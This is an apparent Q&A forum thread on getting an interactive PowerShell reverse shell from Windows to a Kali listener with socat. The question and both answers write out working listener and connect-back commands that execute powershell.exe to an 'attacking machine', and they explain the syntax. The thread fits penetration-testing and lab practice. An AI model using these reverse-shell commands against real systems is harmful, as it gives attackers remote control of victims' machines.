# Getting an Interactive Powershell Reverse Shell Using socat

Tags: powershell, reverse-shell, socat

I've read that socat is capable of creating interactive shells. I'd like to create an interactive Powershell shell.

Kali Listener

```
# socat - tcp4-listen:1338
```

Windows (socat.exe used from here: https://github.com/StudioEtrange/socat-windows)

```
socat.exe tcp-connect:192.168.33.131:1338 exec:powershell.exe,pipes,pty
```

I get a connection but no shell

[image]

And Powershell starts on my Windows machine:
[image]

Does anyone know why this doesn't work?

Comment: It is not clear what you mean by *I get a connection but no shell*.

Comment: Seems to me like everything is working as intended? Your 1st screenshot shows you starting and running a shell daemon, and your 2nd screenshot is you connecting to it; and, in fact, obtaining an interactive shell?

Comment: Hey @will , The first screenshot is my listener on Kali. If it would have been successful I would have expected to see PS C:\inetpub\wwwroot\socat> in Kali, not my Windows box. I'm trying to shovel a Powershell shell from Windows to Kali. Sorry for the confusion.

Comment: Hey @mentallurg , what I meant was a connection happens between by Kali listener and the Windows machine as evidenced by the "Windows PowerShell Copyright (C)..." message however I don't receive a PS C:\inetpub\wwwroot\socat> prompt in my Kali machine.

Comment: [![Windows PowerShell](https://i.stack.imgur.com/uPuMe.png)](https://i.stack.imgur.com/uPuMe.png) Seems work fine in my case between virtual machine macOS (VMware Workstation Pro 16) and Windows 10 host.

Answer (score 0):

Try:

attacking machine:

```
socat -d -d TCP4-LISTEN:1338 STDOUT
```

target machine:

```
socat TCP4:<attacking machine ip>:1338 EXEC:'powershell.exe',pipes
```

source: https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/

Comment: Can you explain why this would work? why `-d`? Why `STDOUT`?

Answer (score 0):

I would suggest a simpler syntax with `socat`, easier to understand and currently working:

**Attacker Machine (Kali Linux 2022.2 x64):**

```
┌──(galoget㉿hackem)-[~]
└─$ socat TCP-L:4444 -
```

**Syntax Details:**

- `TCP-L`: Starts `socat` in listening mode using TCP at a certain port, in this case `4444`.
- `-`: The dash (`-`) is a shortcut to indicate that `socat` will use standard input (`stdin`) and standard output (`stdout`). It will read input data from your console and send it to the opposite end. Then it will also receive data from the opposite end and write it to console output (`STDIO`).

**Target Machine (Windows 10 Pro x64 VM):**

```
C:\socat-windows-master>socat.exe TCP:192.168.245.142:4444 EXEC:powershell.exe,pipes
```

**Syntax Details:**

- `TCP`: Starts `socat` using TCP to connect to a certain IP address and port, in this case the attacker machine: `192.168.245.142` and port: `4444`.
- `EXEC`: Indicates the command to execute as soon as the connection is established, in this case `powershell.exe`
- The `pipes` option forces `powershell.exe` or `cmd.exe` to use Unix style standard input and output.

Let's see these commands in action:

**Target Machine:**
[image: Windows 10 Pro x64 VM - socat connect to attacker machine on port 4444 with reverse shell (powershell.exe)]

**Attacker Machine:**
[image: Kali Linux 2022.2 x64 - socat listening on port 4444]

As you can see the reverse shell works perfectly. The connection is established and everything is OK.